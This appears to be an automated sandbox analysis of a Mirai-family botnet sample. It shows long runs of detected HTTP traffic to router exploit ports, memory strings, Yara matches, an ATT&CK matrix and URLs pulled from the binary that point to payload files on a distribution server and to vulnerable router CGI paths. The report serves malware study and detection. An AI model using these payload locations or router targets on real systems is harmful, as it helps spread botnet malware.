Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46510 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42268 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36862 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 36862
Source: unknown	Network traffic detected: HTTP traffic on port 46510 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46510 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55186 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47160 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42906 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46510 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42268 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60922 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60922 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60922 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60922 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37380 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60828 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60798 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42268 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53492 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33886 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33430 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34734 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54408 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 34734
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35140 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44870 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36554 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57596 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50844 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 50844
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60094 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41474 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 60094
Source: unknown	Network traffic detected: HTTP traffic on port 39674 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49556 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59392 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59392 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59392 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42268 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59392 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46416 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60034 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60034 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46304 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60034 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60034 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46416 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55164 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55800 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55682 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57002 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53412 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 53412
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33584 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41752 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35424 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38248 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38206 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42268 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36330 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45400 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60022 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33364 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56360 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56360 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59816 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34814 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56360 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59470 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35400 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33740 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56360 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33740 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58782 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33740 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56360 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59336 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52588 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 52588
Source: unknown	Network traffic detected: HTTP traffic on port 33740 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44118 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44104 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46232 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46614 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44104 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44104 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46614 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60168 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46560 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46614 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44104 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43438 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43438 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43438 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43438 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46614 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33740 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56360 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32904 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42378 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36750 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58628 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52506 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33904 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 49348 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44722 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 49348
Source: unknown	Network traffic detected: HTTP traffic on port 33904 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35262 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33904 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35262 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33904 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35262 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44728 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46614 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58628 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56836 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36828 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48256 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35262 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34840 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48080 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37946 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47110 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34854 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59202 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44318 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47110 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 58628 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47110 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35262 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57214 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37110 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43894 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59304 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39706 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46614 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47110 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47736 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33740 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51136 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41064 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51198 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56852 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52368 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53788 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51136 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34184 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51136 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47110 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41064 -> 55555

Source: /tmp/qJlf2SjoW4 (PID: 6232)

Queries kernel information via 'uname':

Source: qJlf2SjoW4, 6232.1.00000000bd8d05ad.00000000788c4632.rw-.sdmp, qJlf2SjoW4, 6236.1.00000000bd8d05ad.00000000788c4632.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: qJlf2SjoW4, 6232.1.0000000068e5d798.0000000011c9c2d2.rw-.sdmp, qJlf2SjoW4, 6236.1.0000000068e5d798.0000000011c9c2d2.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: qJlf2SjoW4, 6232.1.00000000bd8d05ad.00000000788c4632.rw-.sdmp, qJlf2SjoW4, 6236.1.00000000bd8d05ad.00000000788c4632.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/qJlf2SjoW4SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/qJlf2SjoW4
Source: qJlf2SjoW4, 6232.1.0000000068e5d798.0000000011c9c2d2.rw-.sdmp, qJlf2SjoW4, 6236.1.0000000068e5d798.0000000011c9c2d2.rw-.sdmp	Binary or memory string: V5!/etc/qemu-binfmt/sh4

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: qJlf2SjoW4, type: SAMPLE
Source: Yara match	File source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: qJlf2SjoW4, type: SAMPLE
Source: Yara match	File source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 File Deletion	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Service Stop
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	3 Ingress Tool Transfer	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qJlf2SjoW4	49%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://127.0.0.1:80/tmUnblock.cgi	0%	Virustotal		Browse
http://127.0.0.1:80/tmUnblock.cgi	0%	Avira URL Cloud	safe
http://103.136.43.52/bin	0%	Avira URL Cloud	safe
http://103.136.43.52/zyxel.sh;	0%	Avira URL Cloud	safe
http://103.136.43.52/bins/Tsunami.mips;	0%	Avira URL Cloud	safe
http://103.136.43.52/bins/Tsunami.x86	0%	Avira URL Cloud	safe
http://192.168.0.14:80/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:80/tmUnblock.cgi	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://192.168.0.14:80/cgi-bin/ViewLog.asp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding//%22%3E	qJlf2SjoW4	false		high
http://103.136.43.52/bin	qJlf2SjoW4	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	qJlf2SjoW4	false		high
http://schemas.xmlsoap.org/soap/envelope//	qJlf2SjoW4	false		high
http://103.136.43.52/zyxel.sh;	qJlf2SjoW4	false	Avira URL Cloud: safe	unknown
http://103.136.43.52/bins/Tsunami.mips;	qJlf2SjoW4	false	Avira URL Cloud: safe	unknown
http://103.136.43.52/bins/Tsunami.x86	qJlf2SjoW4	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	qJlf2SjoW4	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
184.205.51.42	unknown	United States	10507	SPCSUS	false
98.137.77.164	unknown	United States	36647	YAHOO-GQ1US	false
85.143.199.248	unknown	Russian Federation	57010	CLODO-ASRU	false
